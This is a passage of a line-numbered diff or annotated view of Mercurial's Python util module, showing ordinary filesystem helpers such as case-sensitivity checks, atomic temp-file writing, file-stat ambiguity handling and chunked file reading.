1692 except AttributeError:
1690 return os.stat(fp.name)
1693 return os.stat(fp.name)
1691
1694
1692 # File system features
1695 # File system features
1693
1696
1694 def fscasesensitive(path):
1697 def fscasesensitive(path):
1695 """
1698 """
1696 Return true if the given path is on a case-sensitive filesystem
1699 Return true if the given path is on a case-sensitive filesystem
1697
1700
1698 Requires a path (like /foo/.hg) ending with a foldable final
1701 Requires a path (like /foo/.hg) ending with a foldable final
1699 directory component.
1702 directory component.
1700 """
1703 """
1701 s1 = os.lstat(path)
1704 s1 = os.lstat(path)
1702 d, b = os.path.split(path)
1705 d, b = os.path.split(path)
1703 b2 = b.upper()
1706 b2 = b.upper()
1704 if b == b2:
1707 if b == b2:
1705 b2 = b.lower()
1708 b2 = b.lower()
1706 if b == b2:
1709 if b == b2:
1707 return True # no evidence against case sensitivity
1710 return True # no evidence against case sensitivity
1708 p2 = os.path.join(d, b2)
1711 p2 = os.path.join(d, b2)
1709 try:
1712 try:
1710 s2 = os.lstat(p2)
1713 s2 = os.lstat(p2)
1711 if s2 == s1:
1714 if s2 == s1:
1712 return False
1715 return False
1713 return True
1716 return True
1714 except OSError:
1717 except OSError:
1715 return True
1718 return True
1716
1719
1717 try:
1720 try:
1718 import re2
1721 import re2
1719 _re2 = None
1722 _re2 = None
1720 except ImportError:
1723 except ImportError:
1721 _re2 = False
1724 _re2 = False
1722
1725
1723 class _re(object):
1726 class _re(object):
1724 def _checkre2(self):
1727 def _checkre2(self):
1725 global _re2
1728 global _re2
1726 try:
1729 try:
1727 # check if match works, see issue3964
1730 # check if match works, see issue3964
1728 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1731 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1729 except ImportError:
1732 except ImportError:
1730 _re2 = False
1733 _re2 = False
1731
1734
1732 def compile(self, pat, flags=0):
1735 def compile(self, pat, flags=0):
1733 '''Compile a regular expression, using re2 if possible
1736 '''Compile a regular expression, using re2 if possible
1734
1737
1735 For best performance, use only re2-compatible regexp features. The
1738 For best performance, use only re2-compatible regexp features. The
1736 only flags from the re module that are re2-compatible are
1739 only flags from the re module that are re2-compatible are
1737 IGNORECASE and MULTILINE.'''
1740 IGNORECASE and MULTILINE.'''
1738 if _re2 is None:
1741 if _re2 is None:
1739 self._checkre2()
1742 self._checkre2()
1740 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1743 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1741 if flags & remod.IGNORECASE:
1744 if flags & remod.IGNORECASE:
1742 pat = '(?i)' + pat
1745 pat = '(?i)' + pat
1743 if flags & remod.MULTILINE:
1746 if flags & remod.MULTILINE:
1744 pat = '(?m)' + pat
1747 pat = '(?m)' + pat
1745 try:
1748 try:
1746 return re2.compile(pat)
1749 return re2.compile(pat)
1747 except re2.error:
1750 except re2.error:
1748 pass
1751 pass
1749 return remod.compile(pat, flags)
1752 return remod.compile(pat, flags)
1750
1753
1751 @propertycache
1754 @propertycache
1752 def escape(self):
1755 def escape(self):
1753 '''Return the version of escape corresponding to self.compile.
1756 '''Return the version of escape corresponding to self.compile.
1754
1757
1755 This is imperfect because whether re2 or re is used for a particular
1758 This is imperfect because whether re2 or re is used for a particular
1756 function depends on the flags, etc, but it's the best we can do.
1759 function depends on the flags, etc, but it's the best we can do.
1757 '''
1760 '''
1758 global _re2
1761 global _re2
1759 if _re2 is None:
1762 if _re2 is None:
1760 self._checkre2()
1763 self._checkre2()
1761 if _re2:
1764 if _re2:
1762 return re2.escape
1765 return re2.escape
1763 else:
1766 else:
1764 return remod.escape
1767 return remod.escape
1765
1768
1766 re = _re()
1769 re = _re()
1767
1770
1768 _fspathcache = {}
1771 _fspathcache = {}
1769 def fspath(name, root):
1772 def fspath(name, root):
1770 '''Get name in the case stored in the filesystem
1773 '''Get name in the case stored in the filesystem
1771
1774
1772 The name should be relative to root, and be normcase-ed for efficiency.
1775 The name should be relative to root, and be normcase-ed for efficiency.
1773
1776
1774 Note that this function is unnecessary, and should not be
1777 Note that this function is unnecessary, and should not be
1775 called, for case-sensitive filesystems (simply because it's expensive).
1778 called, for case-sensitive filesystems (simply because it's expensive).
1776
1779
1777 The root should be normcase-ed, too.
1780 The root should be normcase-ed, too.
1778 '''
1781 '''
1779 def _makefspathcacheentry(dir):
1782 def _makefspathcacheentry(dir):
1780 return dict((normcase(n), n) for n in os.listdir(dir))
1783 return dict((normcase(n), n) for n in os.listdir(dir))
1781
1784
1782 seps = pycompat.ossep
1785 seps = pycompat.ossep
1783 if pycompat.osaltsep:
1786 if pycompat.osaltsep:
1784 seps = seps + pycompat.osaltsep
1787 seps = seps + pycompat.osaltsep
1785 # Protect backslashes. This gets silly very quickly.
1788 # Protect backslashes. This gets silly very quickly.
1786 seps.replace('\\','\\\\')
1789 seps.replace('\\','\\\\')
1787 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1790 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1788 dir = os.path.normpath(root)
1791 dir = os.path.normpath(root)
1789 result = []
1792 result = []
1790 for part, sep in pattern.findall(name):
1793 for part, sep in pattern.findall(name):
1791 if sep:
1794 if sep:
1792 result.append(sep)
1795 result.append(sep)
1793 continue
1796 continue
1794
1797
1795 if dir not in _fspathcache:
1798 if dir not in _fspathcache:
1796 _fspathcache[dir] = _makefspathcacheentry(dir)
1799 _fspathcache[dir] = _makefspathcacheentry(dir)
1797 contents = _fspathcache[dir]
1800 contents = _fspathcache[dir]
1798
1801
1799 found = contents.get(part)
1802 found = contents.get(part)
1800 if not found:
1803 if not found:
1801 # retry "once per directory" per "dirstate.walk" which
1804 # retry "once per directory" per "dirstate.walk" which
1802 # may take place for each patches of "hg qpush", for example
1805 # may take place for each patches of "hg qpush", for example
1803 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1806 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1804 found = contents.get(part)
1807 found = contents.get(part)
1805
1808
1806 result.append(found or part)
1809 result.append(found or part)
1807 dir = os.path.join(dir, part)
1810 dir = os.path.join(dir, part)
1808
1811
1809 return ''.join(result)
1812 return ''.join(result)
1810
1813
1811 def checknlink(testfile):
1814 def checknlink(testfile):
1812 '''check whether hardlink count reporting works properly'''
1815 '''check whether hardlink count reporting works properly'''
1813
1816
1814 # testfile may be open, so we need a separate file for checking to
1817 # testfile may be open, so we need a separate file for checking to
1815 # work around issue2543 (or testfile may get lost on Samba shares)
1818 # work around issue2543 (or testfile may get lost on Samba shares)
1816 f1, f2, fp = None, None, None
1819 f1, f2, fp = None, None, None
1817 try:
1820 try:
1818 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1821 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1819 suffix='1~', dir=os.path.dirname(testfile))
1822 suffix='1~', dir=os.path.dirname(testfile))
1820 os.close(fd)
1823 os.close(fd)
1821 f2 = '%s2~' % f1[:-2]
1824 f2 = '%s2~' % f1[:-2]
1822
1825
1823 oslink(f1, f2)
1826 oslink(f1, f2)
1824 # nlinks() may behave differently for files on Windows shares if
1827 # nlinks() may behave differently for files on Windows shares if
1825 # the file is open.
1828 # the file is open.
1826 fp = posixfile(f2)
1829 fp = posixfile(f2)
1827 return nlinks(f2) > 1
1830 return nlinks(f2) > 1
1828 except OSError:
1831 except OSError:
1829 return False
1832 return False
1830 finally:
1833 finally:
1831 if fp is not None:
1834 if fp is not None:
1832 fp.close()
1835 fp.close()
1833 for f in (f1, f2):
1836 for f in (f1, f2):
1834 try:
1837 try:
1835 if f is not None:
1838 if f is not None:
1836 os.unlink(f)
1839 os.unlink(f)
1837 except OSError:
1840 except OSError:
1838 pass
1841 pass
1839
1842
1840 def endswithsep(path):
1843 def endswithsep(path):
1841 '''Check path ends with os.sep or os.altsep.'''
1844 '''Check path ends with os.sep or os.altsep.'''
1842 return (path.endswith(pycompat.ossep)
1845 return (path.endswith(pycompat.ossep)
1843 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1846 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1844
1847
1845 def splitpath(path):
1848 def splitpath(path):
1846 '''Split path by os.sep.
1849 '''Split path by os.sep.
1847 Note that this function does not use os.altsep because this is
1850 Note that this function does not use os.altsep because this is
1848 an alternative of simple "xxx.split(os.sep)".
1851 an alternative of simple "xxx.split(os.sep)".
1849 It is recommended to use os.path.normpath() before using this
1852 It is recommended to use os.path.normpath() before using this
1850 function if need.'''
1853 function if need.'''
1851 return path.split(pycompat.ossep)
1854 return path.split(pycompat.ossep)
1852
1855
1853 def gui():
1856 def gui():
1854 '''Are we running in a GUI?'''
1857 '''Are we running in a GUI?'''
1855 if pycompat.isdarwin:
1858 if pycompat.isdarwin:
1856 if 'SSH_CONNECTION' in encoding.environ:
1859 if 'SSH_CONNECTION' in encoding.environ:
1857 # handle SSH access to a box where the user is logged in
1860 # handle SSH access to a box where the user is logged in
1858 return False
1861 return False
1859 elif getattr(osutil, 'isgui', None):
1862 elif getattr(osutil, 'isgui', None):
1860 # check if a CoreGraphics session is available
1863 # check if a CoreGraphics session is available
1861 return osutil.isgui()
1864 return osutil.isgui()
1862 else:
1865 else:
1863 # pure build; use a safe default
1866 # pure build; use a safe default
1864 return True
1867 return True
1865 else:
1868 else:
1866 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1869 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1867
1870
1868 def mktempcopy(name, emptyok=False, createmode=None):
1871 def mktempcopy(name, emptyok=False, createmode=None):
1869 """Create a temporary file with the same contents from name
1872 """Create a temporary file with the same contents from name
1870
1873
1871 The permission bits are copied from the original file.
1874 The permission bits are copied from the original file.
1872
1875
1873 If the temporary file is going to be truncated immediately, you
1876 If the temporary file is going to be truncated immediately, you
1874 can use emptyok=True as an optimization.
1877 can use emptyok=True as an optimization.
1875
1878
1876 Returns the name of the temporary file.
1879 Returns the name of the temporary file.
1877 """
1880 """
1878 d, fn = os.path.split(name)
1881 d, fn = os.path.split(name)
1879 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1882 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1880 os.close(fd)
1883 os.close(fd)
1881 # Temporary files are created with mode 0600, which is usually not
1884 # Temporary files are created with mode 0600, which is usually not
1882 # what we want. If the original file already exists, just copy
1885 # what we want. If the original file already exists, just copy
1883 # its mode. Otherwise, manually obey umask.
1886 # its mode. Otherwise, manually obey umask.
1884 copymode(name, temp, createmode)
1887 copymode(name, temp, createmode)
1885 if emptyok:
1888 if emptyok:
1886 return temp
1889 return temp
1887 try:
1890 try:
1888 try:
1891 try:
1889 ifp = posixfile(name, "rb")
1892 ifp = posixfile(name, "rb")
1890 except IOError as inst:
1893 except IOError as inst:
1891 if inst.errno == errno.ENOENT:
1894 if inst.errno == errno.ENOENT:
1892 return temp
1895 return temp
1893 if not getattr(inst, 'filename', None):
1896 if not getattr(inst, 'filename', None):
1894 inst.filename = name
1897 inst.filename = name
1895 raise
1898 raise
1896 ofp = posixfile(temp, "wb")
1899 ofp = posixfile(temp, "wb")
1897 for chunk in filechunkiter(ifp):
1900 for chunk in filechunkiter(ifp):
1898 ofp.write(chunk)
1901 ofp.write(chunk)
1899 ifp.close()
1902 ifp.close()
1900 ofp.close()
1903 ofp.close()
1901 except: # re-raises
1904 except: # re-raises
1902 try:
1905 try:
1903 os.unlink(temp)
1906 os.unlink(temp)
1904 except OSError:
1907 except OSError:
1905 pass
1908 pass
1906 raise
1909 raise
1907 return temp
1910 return temp
1908
1911
1909 class filestat(object):
1912 class filestat(object):
1910 """help to exactly detect change of a file
1913 """help to exactly detect change of a file
1911
1914
1912 'stat' attribute is result of 'os.stat()' if specified 'path'
1915 'stat' attribute is result of 'os.stat()' if specified 'path'
1913 exists. Otherwise, it is None. This can avoid preparative
1916 exists. Otherwise, it is None. This can avoid preparative
1914 'exists()' examination on client side of this class.
1917 'exists()' examination on client side of this class.
1915 """
1918 """
1916 def __init__(self, stat):
1919 def __init__(self, stat):
1917 self.stat = stat
1920 self.stat = stat
1918
1921
1919 @classmethod
1922 @classmethod
1920 def frompath(cls, path):
1923 def frompath(cls, path):
1921 try:
1924 try:
1922 stat = os.stat(path)
1925 stat = os.stat(path)
1923 except OSError as err:
1926 except OSError as err:
1924 if err.errno != errno.ENOENT:
1927 if err.errno != errno.ENOENT:
1925 raise
1928 raise
1926 stat = None
1929 stat = None
1927 return cls(stat)
1930 return cls(stat)
1928
1931
1929 @classmethod
1932 @classmethod
1930 def fromfp(cls, fp):
1933 def fromfp(cls, fp):
1931 stat = os.fstat(fp.fileno())
1934 stat = os.fstat(fp.fileno())
1932 return cls(stat)
1935 return cls(stat)
1933
1936
1934 __hash__ = object.__hash__
1937 __hash__ = object.__hash__
1935
1938
1936 def __eq__(self, old):
1939 def __eq__(self, old):
1937 try:
1940 try:
1938 # if ambiguity between stat of new and old file is
1941 # if ambiguity between stat of new and old file is
1939 # avoided, comparison of size, ctime and mtime is enough
1942 # avoided, comparison of size, ctime and mtime is enough
1940 # to exactly detect change of a file regardless of platform
1943 # to exactly detect change of a file regardless of platform
1941 return (self.stat.st_size == old.stat.st_size and
1944 return (self.stat.st_size == old.stat.st_size and
1942 self.stat.st_ctime == old.stat.st_ctime and
1945 self.stat.st_ctime == old.stat.st_ctime and
1943 self.stat.st_mtime == old.stat.st_mtime)
1946 self.stat.st_mtime == old.stat.st_mtime)
1944 except AttributeError:
1947 except AttributeError:
1945 pass
1948 pass
1946 try:
1949 try:
1947 return self.stat is None and old.stat is None
1950 return self.stat is None and old.stat is None
1948 except AttributeError:
1951 except AttributeError:
1949 return False
1952 return False
1950
1953
1951 def isambig(self, old):
1954 def isambig(self, old):
1952 """Examine whether new (= self) stat is ambiguous against old one
1955 """Examine whether new (= self) stat is ambiguous against old one
1953
1956
1954 "S[N]" below means stat of a file at N-th change:
1957 "S[N]" below means stat of a file at N-th change:
1955
1958
1956 - S[n-1].ctime < S[n].ctime: can detect change of a file
1959 - S[n-1].ctime < S[n].ctime: can detect change of a file
1957 - S[n-1].ctime == S[n].ctime
1960 - S[n-1].ctime == S[n].ctime
1958 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1961 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1959 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1962 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1960 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1963 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1961 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1964 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1962
1965
1963 Case (*2) above means that a file was changed twice or more at
1966 Case (*2) above means that a file was changed twice or more at
1964 same time in sec (= S[n-1].ctime), and comparison of timestamp
1967 same time in sec (= S[n-1].ctime), and comparison of timestamp
1965 is ambiguous.
1968 is ambiguous.
1966
1969
1967 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1970 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1968 timestamp is ambiguous".
1971 timestamp is ambiguous".
1969
1972
1970 But advancing mtime only in case (*2) doesn't work as
1973 But advancing mtime only in case (*2) doesn't work as
1971 expected, because naturally advanced S[n].mtime in case (*1)
1974 expected, because naturally advanced S[n].mtime in case (*1)
1972 might be equal to manually advanced S[n-1 or earlier].mtime.
1975 might be equal to manually advanced S[n-1 or earlier].mtime.
1973
1976
1974 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1977 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1975 treated as ambiguous regardless of mtime, to avoid overlooking
1978 treated as ambiguous regardless of mtime, to avoid overlooking
1976 by confliction between such mtime.
1979 by confliction between such mtime.
1977
1980
1978 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1981 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1979 S[n].mtime", even if size of a file isn't changed.
1982 S[n].mtime", even if size of a file isn't changed.
1980 """
1983 """
1981 try:
1984 try:
1982 return (self.stat.st_ctime == old.stat.st_ctime)
1985 return (self.stat.st_ctime == old.stat.st_ctime)
1983 except AttributeError:
1986 except AttributeError:
1984 return False
1987 return False
1985
1988
1986 def avoidambig(self, path, old):
1989 def avoidambig(self, path, old):
1987 """Change file stat of specified path to avoid ambiguity
1990 """Change file stat of specified path to avoid ambiguity
1988
1991
1989 'old' should be previous filestat of 'path'.
1992 'old' should be previous filestat of 'path'.
1990
1993
1991 This skips avoiding ambiguity, if a process doesn't have
1994 This skips avoiding ambiguity, if a process doesn't have
1992 appropriate privileges for 'path'. This returns False in this
1995 appropriate privileges for 'path'. This returns False in this
1993 case.
1996 case.
1994
1997
1995 Otherwise, this returns True, as "ambiguity is avoided".
1998 Otherwise, this returns True, as "ambiguity is avoided".
1996 """
1999 """
1997 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
2000 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1998 try:
2001 try:
1999 os.utime(path, (advanced, advanced))
2002 os.utime(path, (advanced, advanced))
2000 except OSError as inst:
2003 except OSError as inst:
2001 if inst.errno == errno.EPERM:
2004 if inst.errno == errno.EPERM:
2002 # utime() on the file created by another user causes EPERM,
2005 # utime() on the file created by another user causes EPERM,
2003 # if a process doesn't have appropriate privileges
2006 # if a process doesn't have appropriate privileges
2004 return False
2007 return False
2005 raise
2008 raise
2006 return True
2009 return True
2007
2010
2008 def __ne__(self, other):
2011 def __ne__(self, other):
2009 return not self == other
2012 return not self == other
2010
2013
2011 class atomictempfile(object):
2014 class atomictempfile(object):
2012 '''writable file object that atomically updates a file
2015 '''writable file object that atomically updates a file
2013
2016
2014 All writes will go to a temporary copy of the original file. Call
2017 All writes will go to a temporary copy of the original file. Call
2015 close() when you are done writing, and atomictempfile will rename
2018 close() when you are done writing, and atomictempfile will rename
2016 the temporary copy to the original name, making the changes
2019 the temporary copy to the original name, making the changes
2017 visible. If the object is destroyed without being closed, all your
2020 visible. If the object is destroyed without being closed, all your
2018 writes are discarded.
2021 writes are discarded.
2019
2022
2020 checkambig argument of constructor is used with filestat, and is
2023 checkambig argument of constructor is used with filestat, and is
2021 useful only if target file is guarded by any lock (e.g. repo.lock
2024 useful only if target file is guarded by any lock (e.g. repo.lock
2022 or repo.wlock).
2025 or repo.wlock).
2023 '''
2026 '''
2024 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2027 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2025 self.__name = name # permanent name
2028 self.__name = name # permanent name
2026 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2029 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2027 createmode=createmode)
2030 createmode=createmode)
2028 self._fp = posixfile(self._tempname, mode)
2031 self._fp = posixfile(self._tempname, mode)
2029 self._checkambig = checkambig
2032 self._checkambig = checkambig
2030
2033
2031 # delegated methods
2034 # delegated methods
2032 self.read = self._fp.read
2035 self.read = self._fp.read
2033 self.write = self._fp.write
2036 self.write = self._fp.write
2034 self.seek = self._fp.seek
2037 self.seek = self._fp.seek
2035 self.tell = self._fp.tell
2038 self.tell = self._fp.tell
2036 self.fileno = self._fp.fileno
2039 self.fileno = self._fp.fileno
2037
2040
2038 def close(self):
2041 def close(self):
2039 if not self._fp.closed:
2042 if not self._fp.closed:
2040 self._fp.close()
2043 self._fp.close()
2041 filename = localpath(self.__name)
2044 filename = localpath(self.__name)
2042 oldstat = self._checkambig and filestat.frompath(filename)
2045 oldstat = self._checkambig and filestat.frompath(filename)
2043 if oldstat and oldstat.stat:
2046 if oldstat and oldstat.stat:
2044 rename(self._tempname, filename)
2047 rename(self._tempname, filename)
2045 newstat = filestat.frompath(filename)
2048 newstat = filestat.frompath(filename)
2046 if newstat.isambig(oldstat):
2049 if newstat.isambig(oldstat):
2047 # stat of changed file is ambiguous to original one
2050 # stat of changed file is ambiguous to original one
2048 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
2051 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
2049 os.utime(filename, (advanced, advanced))
2052 os.utime(filename, (advanced, advanced))
2050 else:
2053 else:
2051 rename(self._tempname, filename)
2054 rename(self._tempname, filename)
2052
2055
2053 def discard(self):
2056 def discard(self):
2054 if not self._fp.closed:
2057 if not self._fp.closed:
2055 try:
2058 try:
2056 os.unlink(self._tempname)
2059 os.unlink(self._tempname)
2057 except OSError:
2060 except OSError:
2058 pass
2061 pass
2059 self._fp.close()
2062 self._fp.close()
2060
2063
2061 def __del__(self):
2064 def __del__(self):
2062 if safehasattr(self, '_fp'): # constructor actually did something
2065 if safehasattr(self, '_fp'): # constructor actually did something
2063 self.discard()
2066 self.discard()
2064
2067
2065 def __enter__(self):
2068 def __enter__(self):
2066 return self
2069 return self
2067
2070
2068 def __exit__(self, exctype, excvalue, traceback):
2071 def __exit__(self, exctype, excvalue, traceback):
2069 if exctype is not None:
2072 if exctype is not None:
2070 self.discard()
2073 self.discard()
2071 else:
2074 else:
2072 self.close()
2075 self.close()
2073
2076
2074 def unlinkpath(f, ignoremissing=False):
2077 def unlinkpath(f, ignoremissing=False):
2075 """unlink and remove the directory if it is empty"""
2078 """unlink and remove the directory if it is empty"""
2076 if ignoremissing:
2079 if ignoremissing:
2077 tryunlink(f)
2080 tryunlink(f)
2078 else:
2081 else:
2079 unlink(f)
2082 unlink(f)
2080 # try removing directories that might now be empty
2083 # try removing directories that might now be empty
2081 try:
2084 try:
2082 removedirs(os.path.dirname(f))
2085 removedirs(os.path.dirname(f))
2083 except OSError:
2086 except OSError:
2084 pass
2087 pass
2085
2088
2086 def tryunlink(f):
2089 def tryunlink(f):
2087 """Attempt to remove a file, ignoring ENOENT errors."""
2090 """Attempt to remove a file, ignoring ENOENT errors."""
2088 try:
2091 try:
2089 unlink(f)
2092 unlink(f)
2090 except OSError as e:
2093 except OSError as e:
2091 if e.errno != errno.ENOENT:
2094 if e.errno != errno.ENOENT:
2092 raise
2095 raise
2093
2096
2094 def makedirs(name, mode=None, notindexed=False):
2097 def makedirs(name, mode=None, notindexed=False):
2095 """recursive directory creation with parent mode inheritance
2098 """recursive directory creation with parent mode inheritance
2096
2099
2097 Newly created directories are marked as "not to be indexed by
2100 Newly created directories are marked as "not to be indexed by
2098 the content indexing service", if ``notindexed`` is specified
2101 the content indexing service", if ``notindexed`` is specified
2099 for "write" mode access.
2102 for "write" mode access.
2100 """
2103 """
2101 try:
2104 try:
2102 makedir(name, notindexed)
2105 makedir(name, notindexed)
2103 except OSError as err:
2106 except OSError as err:
2104 if err.errno == errno.EEXIST:
2107 if err.errno == errno.EEXIST:
2105 return
2108 return
2106 if err.errno != errno.ENOENT or not name:
2109 if err.errno != errno.ENOENT or not name:
2107 raise
2110 raise
2108 parent = os.path.dirname(os.path.abspath(name))
2111 parent = os.path.dirname(os.path.abspath(name))
2109 if parent == name:
2112 if parent == name:
2110 raise
2113 raise
2111 makedirs(parent, mode, notindexed)
2114 makedirs(parent, mode, notindexed)
2112 try:
2115 try:
2113 makedir(name, notindexed)
2116 makedir(name, notindexed)
2114 except OSError as err:
2117 except OSError as err:
2115 # Catch EEXIST to handle races
2118 # Catch EEXIST to handle races
2116 if err.errno == errno.EEXIST:
2119 if err.errno == errno.EEXIST:
2117 return
2120 return
2118 raise
2121 raise
2119 if mode is not None:
2122 if mode is not None:
2120 os.chmod(name, mode)
2123 os.chmod(name, mode)
2121
2124
2122 def readfile(path):
2125 def readfile(path):
2123 with open(path, 'rb') as fp:
2126 with open(path, 'rb') as fp:
2124 return fp.read()
2127 return fp.read()
2125
2128
2126 def writefile(path, text):
2129 def writefile(path, text):
2127 with open(path, 'wb') as fp:
2130 with open(path, 'wb') as fp:
2128 fp.write(text)
2131 fp.write(text)
2129
2132
2130 def appendfile(path, text):
2133 def appendfile(path, text):
2131 with open(path, 'ab') as fp:
2134 with open(path, 'ab') as fp:
2132 fp.write(text)
2135 fp.write(text)
2133
2136
2134 class chunkbuffer(object):
2137 class chunkbuffer(object):
2135 """Allow arbitrary sized chunks of data to be efficiently read from an
2138 """Allow arbitrary sized chunks of data to be efficiently read from an
2136 iterator over chunks of arbitrary size."""
2139 iterator over chunks of arbitrary size."""
2137
2140
2138 def __init__(self, in_iter):
2141 def __init__(self, in_iter):
2139 """in_iter is the iterator that's iterating over the input chunks."""
2142 """in_iter is the iterator that's iterating over the input chunks."""
2140 def splitbig(chunks):
2143 def splitbig(chunks):
2141 for chunk in chunks:
2144 for chunk in chunks:
2142 if len(chunk) > 2**20:
2145 if len(chunk) > 2**20:
2143 pos = 0
2146 pos = 0
2144 while pos < len(chunk):
2147 while pos < len(chunk):
2145 end = pos + 2 ** 18
2148 end = pos + 2 ** 18
2146 yield chunk[pos:end]
2149 yield chunk[pos:end]
2147 pos = end
2150 pos = end
2148 else:
2151 else:
2149 yield chunk
2152 yield chunk
2150 self.iter = splitbig(in_iter)
2153 self.iter = splitbig(in_iter)
2151 self._queue = collections.deque()
2154 self._queue = collections.deque()
2152 self._chunkoffset = 0
2155 self._chunkoffset = 0
2153
2156
2154 def read(self, l=None):
2157 def read(self, l=None):
2155 """Read L bytes of data from the iterator of chunks of data.
2158 """Read L bytes of data from the iterator of chunks of data.
2156 Returns less than L bytes if the iterator runs dry.
2159 Returns less than L bytes if the iterator runs dry.
2157
2160
2158 If size parameter is omitted, read everything"""
2161 If size parameter is omitted, read everything"""
2159 if l is None:
2162 if l is None:
2160 return ''.join(self.iter)
2163 return ''.join(self.iter)
2161
2164
2162 left = l
2165 left = l
2163 buf = []
2166 buf = []
2164 queue = self._queue
2167 queue = self._queue
2165 while left > 0:
2168 while left > 0:
2166 # refill the queue
2169 # refill the queue
2167 if not queue:
2170 if not queue:
2168 target = 2**18
2171 target = 2**18
2169 for chunk in self.iter:
2172 for chunk in self.iter:
2170 queue.append(chunk)
2173 queue.append(chunk)
2171 target -= len(chunk)
2174 target -= len(chunk)
2172 if target <= 0:
2175 if target <= 0:
2173 break
2176 break
2174 if not queue:
2177 if not queue:
2175 break
2178 break
2176
2179
2177 # The easy way to do this would be to queue.popleft(), modify the
2180 # The easy way to do this would be to queue.popleft(), modify the
2178 # chunk (if necessary), then queue.appendleft(). However, for cases
2181 # chunk (if necessary), then queue.appendleft(). However, for cases
2179 # where we read partial chunk content, this incurs 2 dequeue
2182 # where we read partial chunk content, this incurs 2 dequeue
2180 # mutations and creates a new str for the remaining chunk in the
2183 # mutations and creates a new str for the remaining chunk in the
2181 # queue. Our code below avoids this overhead.
2184 # queue. Our code below avoids this overhead.
2182
2185
2183 chunk = queue[0]
2186 chunk = queue[0]
2184 chunkl = len(chunk)
2187 chunkl = len(chunk)
2185 offset = self._chunkoffset
2188 offset = self._chunkoffset
2186
2189
2187 # Use full chunk.
2190 # Use full chunk.
2188 if offset == 0 and left >= chunkl:
2191 if offset == 0 and left >= chunkl:
2189 left -= chunkl
2192 left -= chunkl
2190 queue.popleft()
2193 queue.popleft()
2191 buf.append(chunk)
2194 buf.append(chunk)
2192 # self._chunkoffset remains at 0.
2195 # self._chunkoffset remains at 0.
2193 continue
2196 continue
2194
2197
2195 chunkremaining = chunkl - offset
2198 chunkremaining = chunkl - offset
2196
2199
2197 # Use all of unconsumed part of chunk.
2200 # Use all of unconsumed part of chunk.
2198 if left >= chunkremaining:
2201 if left >= chunkremaining:
2199 left -= chunkremaining
2202 left -= chunkremaining
2200 queue.popleft()
2203 queue.popleft()
2201 # offset == 0 is enabled by block above, so this won't merely
2204 # offset == 0 is enabled by block above, so this won't merely
2202 # copy via ``chunk[0:]``.
2205 # copy via ``chunk[0:]``.
2203 buf.append(chunk[offset:])
2206 buf.append(chunk[offset:])
2204 self._chunkoffset = 0
2207 self._chunkoffset = 0
2205
2208
2206 # Partial chunk needed.
2209 # Partial chunk needed.
2207 else:
2210 else:
2208 buf.append(chunk[offset:offset + left])
2211 buf.append(chunk[offset:offset + left])
2209 self._chunkoffset += left
2212 self._chunkoffset += left
2210 left -= chunkremaining
2213 left -= chunkremaining
2211
2214
2212 return ''.join(buf)
2215 return ''.join(buf)
2213
2216
2214 def filechunkiter(f, size=131072, limit=None):
2217 def filechunkiter(f, size=131072, limit=None):
2215 """Create a generator that produces the data in the file size
2218 """Create a generator that produces the data in the file size
2216 (default 131072) bytes at a time, up to optional limit (default is
2219 (default 131072) bytes at a time, up to optional limit (default is
2217 to read all data). Chunks may be less than size bytes if the
2220 to read all data). Chunks may be less than size bytes if the
2218 chunk is the last chunk in the file, or the file is a socket or
2221 chunk is the last chunk in the file, or the file is a socket or
2219 some other type of file that sometimes reads less data than is
2222 some other type of file that sometimes reads less data than is
2220 requested."""
2223 requested."""
2221 assert size >= 0
2224 assert size >= 0
2222 assert limit is None or limit >= 0
2225 assert limit is None or limit >= 0
2223 while True:
2226 while True:
2224 if limit is None:
2227 if limit is None:
2225 nbytes = size
2228 nbytes = size
2226 else:
2229 else:
2227 nbytes = min(limit, size)
2230 nbytes = min(limit, size)
2228 s = nbytes and f.read(nbytes)
2231 s = nbytes and f.read(nbytes)
2229 if not s:
2232 if not s:
2230 break
2233 break
2231 if limit:
2234 if limit:
2232 limit -= len(s)
2235 limit -= len(s)
2233 yield s
2236 yield s
2234
2237
2235 class cappedreader(object):
2238 class cappedreader(object):
2236 """A file object proxy that allows reading up to N bytes.
2239 """A file object proxy that allows reading up to N bytes.
2237
2240
2238 Given a source file object, instances of this type allow reading up to
2241 Given a source file object, instances of this type allow reading up to
